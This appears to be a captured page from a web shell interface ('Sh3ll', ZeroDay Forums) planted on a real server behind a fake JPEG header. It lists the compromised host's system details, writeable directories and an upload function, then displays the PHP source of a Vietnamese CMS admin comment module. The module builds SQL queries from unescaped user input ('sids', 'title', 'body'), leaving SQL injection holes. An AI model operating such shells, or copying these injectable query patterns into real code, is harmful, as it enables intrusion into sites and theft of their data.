����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/vidoe.top/admin_new/mod/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/vidoe.top/admin_new/mod/comment.php
<?php
class comment{

	function comment (){
	
		global $CORE, $TBS;
		
		$TBS->LoadTemplate(ADMIN_PATH."skin/comment.html");
	
		switch($CORE->input['code']){
			
			default : $this->goList(); break;			
			
			case 'post': $this->goPost(); break;
			
			case 'del': $this->goDel(); break;
	
		}	
	}

	function goList(){
	
		global $CORE, $DB, $TBS, $func, $print;
		
		$TBS->MergeField('section','list');
		
		if($CORE->input['task']=='activate'){ // Do activate ----------------	
			
			$selected = explode("|",$CORE->input['sids']);
			
			foreach ($selected as $v) $DB->query("UPDATE NNCCMS_comment SET `status`='1' WHERE `id`='$v'");			
			
			return $print->redirect ('Đã kích hoạt',$CORE->admin_url.'&act=comment');			
		}
	
		if($CORE->input['task']=='deactivate'){ // Do activate ----------------	
			
			$selected = explode("|",$CORE->input['sids']);
			
			foreach ($selected as $v) $DB->query("UPDATE NNCCMS_comment SET `status`='0' WHERE `id`='$v'");			
			
			return $print->redirect ('Đã bỏ kích hoạt',$CORE->admin_url.'&act=comment');	
		}
		if($CORE->input['task']=='massdel'){ // Do activate ----------------	
			
			$selected = explode("|",$CORE->input['sids']);
			
			foreach ($selected as $v)
			{
				
				$DB->query("DELETE FROM NNCCMS_comment WHERE `id`='$v'");
				
			}	
			
			return $print->redirect ('Đã xóa',$CORE->admin_url.'&act=comment');	
		}
		
		// Search - Category
		
		
		
		$pageNum = ($_GET['pageNum']>0) ? intval($_GET['pageNum']) : 1;
		$pageSize = 20;	
		$from = (($pageNum * $pageSize) - $pageSize);	
		//$t = $DB->query("SELECT a.id FROM NNCCMS_comment");
		$t = $DB->query("SELECT * FROM NNCCMS_comment");
		$total = mysql_num_rows($t);
		$totalPage = ceil($total / $pageSize);
		// Pagination DB
		$query = $DB->query("SELECT * FROM NNCCMS_comment LIMIT $from, $pageSize");
		
		$c = 0;
		while($row = $DB->fetch_row($query))
		{
			$c++;
			$row['no'] = $c;
			$row['body'] = html_entity_decode($row['body']);
			$row['time'] = date('d/m/Y',$row['time']);
			
			$row['astatus'] = ($row['status']==0)?'<img src="skin/images/memsearch_delete.gif" title="chưa kích hoạt" border="0">':'<img src="skin/images/pnav.png" title="đã kích hoạt" border="0">';
			
			$arr[] = $row;
		}
		
		if(is_null($arr)) $arr[] = array();
		$TBS->MergeBlock('list',$arr);	
		$nav = $print->Pagination2($totalPage,$pageNum,$CORE->admin_url.'&act=comment');
		$TBS->MergeField('nav',$nav);	
		$TBS->Show(TBS_OUTPUT+TBS_NOTHING);

	}
	
	function goPost(){
	
		global $CORE, $DB, $func, $TBS, $print;		
		
		$TBS->MergeField('section','post');
		
		if($_SESSION['error']) unset($CORE->input['bsubmit']);
			
		// Show post -----------------------------------------------------------------------
		if(!$CORE->input['bsubmit']){
		
			$id = intval($CORE->input['id']);
			
			if ($_SESSION['error']) $prevError = $_SESSION['error']; unset($_SESSION['error']);
			if ($_SESSION['state']) $prevState = $_SESSION['state']; unset($_SESSION['state']);
			
			if($prevState!=NULL){			
				$data = $prevState;				
			}else{			
				if($id==0){					
					$data['status'] = 1;
				}else{				
					$query = $DB->query(
					"SELECT c.*, n.* FROM NNCCMS_comment n LEFT JOIN NNCCMS_commentcat c on (n.cid = c.cid) WHERE id='".$id."'");
					$data = $DB->fetch_row($query);			
				}			
			}
			
			$data['cat'] = $func->drop_down_menu('cat',$data['cid'],'NNCCMS_commentcat','cid','cname','');	//,'Không chọn...'
			//$fcat = $func->drop_down_menu('fcat',$CORE->input['fcat'],'NNCCMS_commentcat','cid','cname','','Chọn nhóm');	
			$data['intro'] = $func->loadWYS('intro',$data['intro'],15);	
			$data['body'] = $func->loadWYS('body',$data['body'],20);
			$data['ebody'] = $func->loadWYS('ebody',$data['ebody'],20);
			$data['noibat'] = $func->makebox($data['noibat'],'noibat');
			$data['status'] = $func->yes_no($data['status'],'status');	
			
			$error[] = $prevError;			
			$post[] = $data;
			
			$TBS->MergeBlock('error',$error);
			$TBS->MergeBlock('post',$post);		
			
			// Show page --------------
			$TBS->Show(TBS_OUTPUT+TBS_NOTHING);	
				
		// Do post -------------------------------------------
		}else{
		
			$id = $state['id'] = intval($CORE->input['id']);
			$cat = $state['cat'] = intval($CORE->input['cat']);			
			$title = $state['title'] = $CORE->input['title'];
			$etitle = $state['etitle'] = $CORE->input['etitle'];
			$img = $state['img'] = $CORE->input['img'];
			$intro = $state['intro'] = $CORE->input['intro'];
			$body = $state['body'] = $CORE->input['body'];
			$ebody = $state['ebody'] = $CORE->input['ebody'];
			
			//$price = $state['price'] = intval($CORE->input['price']);
			
			$noibat = $state['noibat'] = intval($CORE->input['noibat']);	
					
			$pos = $state['pos'] = intval($CORE->input['pos']);		
			$status = $state['status'] = intval($CORE->input['status']);			
			$time = time();			
			
			// -------------- check -------------------------
			if($title=='') $error['title'] = 1;
			
			// Create image	------------------------------------------------------------------------			
			include( ROOT_PATH."lib/class_upload.php" );
			$handle = new Upload($_FILES['post_image']);
			
			if ($handle->uploaded) {
				
				// Check image size and image type
				if($handle->file_src_size>=500000) $error['image'] = 1;
				if(!in_array($handle->file_src_mime,array('image/jpeg','image/pjpeg','image/gif','image/png','image/x-png'))) $error['image'] = 1;
				
				// comment image -----------------
				
				//$handle->image_resize            = true;
				//$handle->image_ratio_crop	     = true;
				//$handle->image_x                 = $this->image_size;
				//$handle->image_y                 = $this->image_size;	
				
				// Crop fill (image_backround_color) --------------------------------------------------------------------
				$handle->image_resize          = false;				
				//$handle->image_ratio_fill      = true;
				//$handle->image_x               = 300;	
				$handle->image_ratio_y = true;
				//$handle->image_y               = 300;
				//$handle->image_background_color = '#ffffff';					
				
				//$handle->image_bevel           = 5;
				//$handle->image_bevel_color1    = '#EEEEEE';
				//$handle->image_bevel_color2    = '#EEEEEE';
				
				//$handle->image_reflection_height = '50px';
				//$handle->image_reflection_space = -50;
				
				$handle->comment(ROOT_PATH.'upload/');
				// End comment image -------------------
				if(!$handle->commented) $error['image'] = 1;
				
				// Clear ----------------
				$handle->Clean();				
			
			}
			elseif($CORE->input['del_img'] && $img)
			{				
				if(file_exists(ROOT_PATH.'upload/'.$img)) unlink(ROOT_PATH.'upload/'.$img);	
				$file_deleted = true;		
			}
			
			//set 
			include ROOT_PATH."lib/watermark.class.php";
			 $path       =   ROOT_PATH.'upload/';
			 $file       =   ROOT_PATH.'upload/'.$handle->file_dst_name; // original photo
			
			 $font       =   ROOT_PATH."lib/font/VeraMono.ttf";
			 $text       =   $CORE->vars['sitename'];
			 $factor     =   "";
			 $browser    =   false;
  			$fontsize   =   8;
			//call water mark
			$force      =   true;
       		$foto       =   new watermark($path,$file,$font,$text,$factor,$fontsize,$force,$browser);//watermark img
			
			// If detects any errors then return to the postform with errors
			if($error!=''){				
				$_SESSION['error'] = $error;
				$_SESSION['state'] = $state;
				return $this->goPost();				
			}
			$body = str_replace('thietkeweb_vi/upload',$CORE->homeurl.'upload',$body);
			
			$ebody = str_replace('thietkeweb_vi/upload',$CORE->homeurl.'upload',$ebody);
			// Do Add ------------------
			if($id==0){
				 
				 $DB->query("INSERT INTO `NNCCMS_comment`(`cid`,`img`,`title`,`etitle`,`intro`,`body`,`ebody`,`time`,`pos`,`status`,`noibat`)
				 VALUES(
				 '".$cat."','".$handle->file_dst_name."','".$title."','".$etitle."','".$intro."','".$body."','".$ebody."','".$time."','".$pos."','".$status."','".$noibat."');");
				
			// Do Edit -----------------
			}else{			
						
				if($handle->file_dst_name!=''){									
					$query = $DB->query("SELECT img FROM `NNCCMS_comment` WHERE id='".$id."'");
					$result = $DB->fetch_row($query);
					// Delete old files
					if($result['img'] !='') unlink(ROOT_PATH.'upload/'.$result['img']);					
					$DB->query("UPDATE `NNCCMS_comment` SET `img`='".$handle->file_dst_name."' WHERE `id`='".$id."'");					
				}
				elseif($file_deleted)
				{
					$DB->query("UPDATE `NNCCMS_comment` SET `img`='' WHERE `id`='".$id."'");	
				}
				
				$DB->query("UPDATE `NNCCMS_comment` SET `cid` = '$cat',`title` = '$title',`etitle` = '$etitle',`intro` ='$intro' ,`body` = '$body',`ebody` = '$ebody',`pos` = '$pos',`status` = '$status',`time` = '$time',`noibat` = '$noibat' WHERE `id`='$id'");
				
			}

			return $print->redirect("Đã cập nhật","index.php?act=comment");
		
		}
	
	}
	
	function goDel(){
		global $CORE, $DB, $print;
		
		if (!$CORE->user['g_supmod'] && !$CORE->user['g_access_cp']){		
			return;
		}
		
		$id	=	intval($CORE->input['id']);
		
		$query = $DB->query("SELECT cid,img FROM NNCCMS_comment WHERE id='".$id."'");
			$result = $DB->fetch_row($query);
			// Delete old files ---
			if($result['img'] !=''){			
				unlink(ROOT_PATH.$this->path_image.$result['img']);				
			}
		
		$DB->query("DELETE FROM NNCCMS_comment WHERE id='".$id."'");
	
		$print->redirect("Đã xóa","index.php?act=comment&cat=".$result['cid']);
	}

}
$run = new comment();
?>

ZeroDay Forums Mini